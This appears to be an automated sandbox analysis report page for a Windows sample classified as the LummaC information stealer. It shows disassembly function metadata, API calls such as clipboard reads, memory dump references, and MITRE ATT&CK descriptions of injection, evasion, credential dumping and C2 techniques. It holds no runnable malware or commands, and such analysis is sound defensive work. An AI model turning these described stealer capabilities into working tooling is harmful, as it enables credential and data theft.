Instruction Fuzzy Hash: 77C0123868C14487C708CF54DC40276F3A5E78B305F94A06DC44513306C5709816AA8D

Uniqueness

Uniqueness Score: -1.00%

Function 036BA3E9 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c77a9ebc51a86675e44a6f99a3966b2793bef48500e2cda15b5f9fb58d67fea
Instruction ID: 19f64cb10f1b26cc25246e2f2322bcfccda0809cf3c3a7a40b4149573a914f05
Opcode Fuzzy Hash: 7c77a9ebc51a86675e44a6f99a3966b2793bef48500e2cda15b5f9fb58d67fea
Instruction Fuzzy Hash: D3C0123864C14487C708CF55DC40276F2B6E787305F94A06CC80553302D571984A9A4C

Uniqueness

Uniqueness Score: -1.00%

Function 00422422 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b5e3e9669de4d50f267f7cffccdae9573317f8fd3ea8b9d4cd734cdd1d2440a
Instruction ID: a0589430dc82ea4d69e026f10a0c0d3340d885b5bea6ee464c50c2b2f2e1b1d9
Opcode Fuzzy Hash: 4b5e3e9669de4d50f267f7cffccdae9573317f8fd3ea8b9d4cd734cdd1d2440a
Instruction Fuzzy Hash: 45C04C6DF961814B8648CF059D5277662AAD7CB615725A1388456D3B64CA64E8028508

Uniqueness

Uniqueness Score: -1.00%

Function 036A2689 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b5e3e9669de4d50f267f7cffccdae9573317f8fd3ea8b9d4cd734cdd1d2440a
Instruction ID: a0589430dc82ea4d69e026f10a0c0d3340d885b5bea6ee464c50c2b2f2e1b1d9
Opcode Fuzzy Hash: 4b5e3e9669de4d50f267f7cffccdae9573317f8fd3ea8b9d4cd734cdd1d2440a
Instruction Fuzzy Hash: 45C04C6DF961814B8648CF059D5277662AAD7CB615725A1388456D3B64CA64E8028508

Uniqueness

Uniqueness Score: -1.00%

Function 0043A190 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e002cc3f42241922a38815367ad6a91b3fcbe031655e2ba6955275dd152be1d5
Instruction ID: e16380c9e19cfba4a111690c21ce1dbdc4287d768eea557a9fc4bb7991e523d7
Opcode Fuzzy Hash: e002cc3f42241922a38815367ad6a91b3fcbe031655e2ba6955275dd152be1d5
Instruction Fuzzy Hash: 44C04C7C64D14087D70CCF50D955676F3BAEB87705F94E16DC44513656C6709806AA4C

Uniqueness

Uniqueness Score: -1.00%

Function 036BA3F7 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e002cc3f42241922a38815367ad6a91b3fcbe031655e2ba6955275dd152be1d5
Instruction ID: e16380c9e19cfba4a111690c21ce1dbdc4287d768eea557a9fc4bb7991e523d7
Opcode Fuzzy Hash: e002cc3f42241922a38815367ad6a91b3fcbe031655e2ba6955275dd152be1d5
Instruction Fuzzy Hash: 44C04C7C64D14087D70CCF50D955676F3BAEB87705F94E16DC44513656C6709806AA4C

Uniqueness

Uniqueness Score: -1.00%

Function 036ADB57 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 155clipboardCOMMON

Download Yara Rule

APIs

GetWindowInfo.USER32 ref: 036ADBB3
OpenClipboard.USER32 ref: 036ADBC5
GetClipboardData.USER32 ref: 036ADBE4
CloseClipboard.USER32 ref: 036ADD16

Strings

c, xrefs: 036ADC4C
l, xrefs: 036ADC70
c, xrefs: 036ADC6C
n, xrefs: 036ADC68
a, xrefs: 036ADC5C
b, xrefs: 036ADC54

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataInfoOpenWindow
String ID: a$b$c$c$l$n
API String ID: 2278096442-2118919457
Opcode ID: 2b54a1d56b7a988d8ad228d874f51f3b45e33c2b14fc036dc6775d2ce95685e6
Instruction ID: abf3e4398026011f4602632f59554c976691786b49187db62a865301b792b33d
Opcode Fuzzy Hash: 2b54a1d56b7a988d8ad228d874f51f3b45e33c2b14fc036dc6775d2ce95685e6
Instruction Fuzzy Hash: E6516EB4404B80CFD720DF3CC585616BBF1AF16214F088A6DD8D68BB96D775E906CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0369E907 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0369EA32
RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 0369EA61

Strings

mz, xrefs: 0369EA87
JE, xrefs: 0369E992
N, xrefs: 0369EA8F

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: JE$N$mz
API String ID: 237503144-108684729
Opcode ID: bc3b9213bb2758d3e3e68cc74ab0fc31b7c5d13228ea9ed8bb1be7c6613b1ba5
Instruction ID: 0510a7ed8ddcfd929e8710e9e23b9180a05678281d22ab168fb6c2132bb56b9c
Opcode Fuzzy Hash: bc3b9213bb2758d3e3e68cc74ab0fc31b7c5d13228ea9ed8bb1be7c6613b1ba5
Instruction Fuzzy Hash: C6514FB0108381AFE710CF01C895B4BBBE9EBC6794F108E1DF8A44B391D7B5D9498B96

Uniqueness

Uniqueness Score: -1.00%

Function 004226D0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 004227C2
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 004227F9

Strings

MNO, xrefs: 00422814

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: MNO
API String ID: 237503144-1907183675
Opcode ID: 8c767264797024f60dc898dc0aaff19022dbdba7ce675aa866db1637c3130b51
Instruction ID: 6712c612b84ee881e1d235e81750fed71cd5445294cf952b386b04711fbcdcd3
Opcode Fuzzy Hash: 8c767264797024f60dc898dc0aaff19022dbdba7ce675aa866db1637c3130b51
Instruction Fuzzy Hash: 42B11571240B108BE32ACF24C5A0797BBE2FB85704F554B1DC9A74BA90D7B4B54ACB94

Uniqueness

Uniqueness Score: -1.00%

Function 036A2937 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 036A2A29
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 036A2A60

Strings

MNO, xrefs: 036A2A7B

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: MNO
API String ID: 237503144-1907183675
Opcode ID: 78e6315bce8a6187e0842bc67264e23d18a0778db6b2ddcc4db9a03e1ee5456f
Instruction ID: 2d3b05f77f255f81d3e71ca9290c87bbaed1028e77e5b6bccd686a64e8ad2eab
Opcode Fuzzy Hash: 78e6315bce8a6187e0842bc67264e23d18a0778db6b2ddcc4db9a03e1ee5456f
Instruction Fuzzy Hash: 36B10271140F008BE32ACF24C5A4797BBE2BB85708F554F1DC9A74BA91D7B4B50ACB84

Uniqueness

Uniqueness Score: -1.00%

Function 036AE656 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SelectObject.GDI32 ref: 036AE69E
SelectObject.GDI32 ref: 036AE720

Strings

, xrefs: 036AE6ED

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID: ObjectSelect
String ID:
API String ID: 1517587568-3916222277
Opcode ID: e0dffe2799290b1325598bf0a61f6d8834782f29a839223cc3ea3d362ac7b798
Instruction ID: c1626bbc1fc4d90baf66293be988bae82e6e04087c9ed26b50d487d65accdbf3
Opcode Fuzzy Hash: e0dffe2799290b1325598bf0a61f6d8834782f29a839223cc3ea3d362ac7b798
Instruction Fuzzy Hash: 01513BB8605B008FC364DF28D595A16BBF1FB89300B118A6DE98A8BB60D731F845CF56

Uniqueness

Uniqueness Score: -1.00%

Function 03689057 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 036890C7

Strings

often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs, xrefs: 0368908D

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs
API String ID: 621844428-3137510881
Opcode ID: 1f54d65f0a049a0af63e194947d137ef6acec4bdd30eaa2fe77be7f0d6b7cb0e
Instruction ID: 39234dc8202685f87cec4eb9ae174a0a86d5a74fbe0075d9ec6543c0720e1fb1
Opcode Fuzzy Hash: 1f54d65f0a049a0af63e194947d137ef6acec4bdd30eaa2fe77be7f0d6b7cb0e
Instruction Fuzzy Hash: 5CF0A478408311DADA00FBB496046BD7AF89F5C365F10472ED9D6D5260DB75808A8B9B

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5c35b761e7b2886414fdd9b14cedcc55e7ebf4_79a0e859_e937197c-8d4c-4a9e-9e0b-35ae5b0d1770\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_f26ec913b0e96e6b4e4a1fab19facc1930b3e25_79a0e859_42dc5897-5fe7-48b0-9f37-20795f382a3b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE01F.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE10A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE12B.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE30D.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE773.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE793.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
file.exe

Function 004156B6 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 488
COMMON

Function 004046D0 Relevance: 5.5, Strings: 4, Instructions: 506
COMMON

Function 0368003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00427C0B Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 72
memoryCOMMON

Function 0041E6A0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138
COMMON

Function 004248C4 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 610
COMMON

Function 004248C7 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 602
COMMON

Function 004252A4 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458
COMMON

Function 0042E3EF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110
COMMON